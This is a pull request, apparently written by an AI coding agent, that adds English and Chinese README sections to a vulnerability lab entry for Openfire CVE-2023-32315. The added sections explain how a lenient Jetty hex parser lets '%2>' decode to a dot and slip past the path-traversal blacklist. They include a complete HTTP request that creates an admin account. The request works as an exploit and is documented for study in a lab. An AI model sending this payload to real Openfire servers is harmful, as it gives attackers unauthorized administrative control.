### PR TITLE
Document alternative %2> bypass for Openfire CVE-2023-32315

### DIFF
--- a/openfire/CVE-2023-32315/README.md
+++ b/openfire/CVE-2023-32315/README.md
@@ -52,3 +52,17 @@ Although an exception is raised in response but an account with both username an
 Then log in to the admin console with this account, and you can see that `hackme` is already an administrator.
 
 ![](2.png)
+
+### Alternative bypass via lenient hex parsing
+
+The embedded Jetty server uses a branch-free formula in `TypeUtil.convertHexDigit` to convert hex characters to their numeric value. The formula is correct for `0`-`9`, `a`-`f` and `A`-`F`, but it does not validate the character class. Several non-hex characters happen to produce values in the `0`-`15` range and are accepted as valid hex digits: `:`, `;`, `<`, `=`, `>`, `?`, `@` and `` ` ``. Among them, `>` (0x3e) yields the same value as `e`/`E` (14), so `%2>` is decoded to the same byte as `%2e` (i.e. `.`).
+
+Because the path traversal blacklist only matches the literal substrings `..`, `%2e` and `%u002e`, this is another way to bypass it. The same exploit works with the following alternative payload:
+
+```
+GET /setup/setup-s/%2>%2>/%2>%2>/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
+Host: localhost:9090
+Cookie: csrf=csrftoken
+
+
+```

--- a/openfire/CVE-2023-32315/README.zh-cn.md
+++ b/openfire/CVE-2023-32315/README.zh-cn.md
@@ -50,3 +50,17 @@ Cookie: csrf=csrftoken
 之后我们便可以使用这个账号登录管理后台：
 
 ![](2.png)
+
+### 利用 Jetty 宽松的 hex 解析进行绕过
+
+Openfire 内嵌的 Jetty 在 `TypeUtil.convertHexDigit` 中使用了一个无分支的优化公式，将 hex 字符转换为对应的数值。该公式对 `0`-`9`、`a`-`f`、`A`-`F` 是正确的，但**没有校验字符类别**。一些非 hex 字符代入该公式后输出仍落在 `0`-`15` 区间内，从而被错误地视作合法 hex 字符：`:`、`;`、`<`、`=`、`>`、`?`、`@` 以及 `` ` ``。其中 `>`（0x3e）算出来的值与 `e`/`E` 相同（14），因此 `%2>` 被解码成与 `%2e` 相同的字节（即 `.`）。
+
+而 Openfire 的路径穿越黑名单只检查 `..`、`%2e`、`%u002e` 这些字面字符串，所以 `%2>%2>` 这种"影子 hex"变种也能绕过校验。可使用如下 payload 同样触发该漏洞：
+
+```
+GET /setup/setup-s/%2>%2>/%2>%2>/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
+Host: localhost:9090
+Cookie: csrf=csrftoken
+
+
+```


### PR DESCRIPTION
## Summary

- Add a new section to the Openfire CVE-2023-32315 READMEs (both English and Chinese) describing an alternative path-traversal bypass using `%2>%2>` instead of the well-known `%u002e%u002e`.
- Explain the underlying root cause: the embedded Jetty's `TypeUtil.convertHexDigit` uses a branch-free formula that does not validate the character class, so several non-hex characters (`:`, `;`, `<`, `=`, `>`, `?`, `@`, `` ` ``) are accepted as valid hex digits. `%2>` happens to decode to the same byte as `%2e` (i.e. `.`), bypassing string-based blacklists that only check for `..`, `%2e` and `%u002e`.
- Provide the alternative HTTP request that creates an admin user, mirroring the original PoC structure.

## Test plan

- [x] Verify `GET /setup/setup-s/%2>%2>/%2>%2>/user-create.jsp?...` against `vulhub/openfire:4.7.4` returns 200 and creates the `hackme` admin user.
- [x] Verify the original `%u002e%u002e` payload still works (regression check on docs only — no code changes).

🤖 Generated with [Claude Code](https://claude.com/claude-code) via [Happy](https://happy.engineering)